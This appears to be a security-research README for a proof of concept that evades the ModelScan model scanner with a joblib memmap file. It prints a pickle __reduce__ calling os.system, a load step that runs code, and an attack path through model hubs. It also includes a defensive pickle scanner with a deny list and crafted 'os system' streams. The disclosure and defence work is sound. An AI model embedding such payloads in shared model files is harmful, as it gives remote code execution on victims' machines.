# ModelScan Bypass - Memory-Mapped Array ⭐ PRIMARY FINDING

**Security Research - ModelScan Bypass Technique**

## Overview

This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan,
a popular ML model security scanner. The technique allows malicious pickle-based model files
to evade detection.

## Technique

**Memory-mapped array bypass**

Uses joblib's memmap feature with a malicious `__reduce__` method.

## ModelScan Result

**SCANNED but found NO ISSUES ✅ (TRUE BYPASS)**

## File

- `exploit_memmap_bypass.joblib`

## Reproduction Steps

### Testing with ModelScan

```bash
# Install ModelScan
pip install modelscan

# Download the exploit file from this repository, then scan it
modelscan scan -p exploit_memmap_bypass.joblib
```

### Expected Result

SCANNED but found NO ISSUES ✅ (TRUE BYPASS)

### Triggering the Exploit (⚠️ DO NOT RUN ON PRODUCTION)

```python
import joblib

# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_memmap_bypass.joblib')
```

## Technical Details

This exploit uses Python's pickle `__reduce__` method for RCE:

```python
def __reduce__(self):
    import os
    return (os.system, ('echo "RCE executed!"',))
```

**Why ModelScan misses this:**

The payload is embedded through joblib's memmap feature together with the malicious `__reduce__` method shown above; ModelScan scans the resulting file and reports no issues.
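The README does not spell out which part of the file ModelScan fails to inspect, so a useful defender-side complement is a static check that lists every global a pickle stream would import before anything is loaded, and that fails closed when the stream cannot be parsed instead of reporting it clean. The Python below is an added example, not code from this repository or from ModelScan; the deny list and the sample streams are constructed for illustration, and it assumes a plain pickle stream (joblib containers that store raw array bytes alongside the pickle opcodes, or that are compressed, need joblib-aware handling first).

```python
import pickle
import pickletools
from typing import Dict, List, Tuple

# Constructed deny list: modules a model file has no reason to import at load time.
DENY_MODULES = {"os", "posix", "nt", "subprocess", "builtins", "__builtin__",
                "sys", "runpy", "importlib", "socket", "shutil", "pty"}

# Opcodes that push a string constant; STACK_GLOBAL consumes the two most recent.
STRING_OPCODES = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
                  "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}

def find_globals(data: bytes) -> List[Tuple[str, str]]:
    """List every (module, name) the stream imports, without unpickling it."""
    found: List[Tuple[str, str]] = []
    strings: List[str] = []  # string constants in push order
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in STRING_OPCODES:
            strings.append(arg)
        elif opcode.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)  # pickletools joins the pair with a space
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # Approximation: module and name are assumed to be the last two pushed
            # strings; a stream that reuses memo slots needs a full stack model.
            pair = (strings[-2], strings[-1]) if len(strings) >= 2 else ("<unknown>", "<unknown>")
            found.append(pair)
    return found

def scan_pickle(data: bytes) -> Dict[str, object]:
    """Fail closed: an unparseable stream is reported as such, never as clean."""
    try:
        seen = find_globals(data)
    except ValueError as exc:
        return {"verdict": "UNSCANNABLE", "error": str(exc), "suspicious": []}
    bad = [(m, n) for m, n in seen if m.split(".")[0] in DENY_MODULES]
    return {"verdict": "SUSPICIOUS" if bad else "CLEAN", "globals": seen, "suspicious": bad}

# Constructed sample streams: they are only parsed here, never passed to pickle.loads.
CLEAN_STREAM = pickle.dumps({"weights": [0.1, 0.2], "bias": 0.5}, protocol=2)
GLOBAL_STREAM = b"\x80\x02cos\nsystem\n."  # PROTO 2, GLOBAL "os system", STOP
STACK_GLOBAL_STREAM = b"\x80\x04\x8c\x02os\x94\x8c\x06system\x94\x93."  # protocol-4 form
GARBAGE_STREAM = b"\x80\x02\xff\xfe\xfd"  # invalid opcodes, as raw array bytes would be

if __name__ == "__main__":
    for label, stream in [("clean", CLEAN_STREAM), ("global", GLOBAL_STREAM),
                          ("stack_global", STACK_GLOBAL_STREAM), ("garbage", GARBAGE_STREAM)]:
        print(label, scan_pickle(stream)["verdict"])
```

The point of the UNSCANNABLE verdict is the failure mode the attack vector below relies on: a scanner that cannot parse a file must surface that, not report "No issues found".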
## Security Impact

**Severity**: HIGH

**Attack Vector**:

1. Attacker creates a malicious model using this technique
2. Uploads it to a model hub (HuggingFace, etc.)
3. Victim downloads it and scans it with ModelScan
4. Scanner reports "No issues found!" or skips the file
5. Victim loads the model → RCE

## Part of Larger Research

This is one of four bypass techniques discovered:

1. [Compression Mismatch](https://huggingface.co/sandeep1337/modelscan-bypass-compression-mismatch)
2. [Double Compression](https://huggingface.co/sandeep1337/modelscan-bypass-double-compression)
3. [Corrupt Header](https://huggingface.co/sandeep1337/modelscan-bypass-corrupt-header)
4. [Memmap Bypass ⭐](https://huggingface.co/sandeep1337/modelscan-bypass-memmap) - PRIMARY FINDING

## Disclosure

This research is being submitted to Huntr's bug bounty program for responsible disclosure.

**Date**: December 25, 2024

**Researcher**: Security Research Team

## References

- [Huntr Bug Bounty](https://huntr.com/)
- [ModelScan GitHub](https://github.com/protectai/modelscan)

## Disclaimer

⚠️ **For Security Research Only**

This file is provided for security research and vulnerability disclosure purposes only.
Do not use this technique for malicious purposes. Loading this file will execute code.

---

**Status**: Under responsible disclosure to Huntr bug bounty program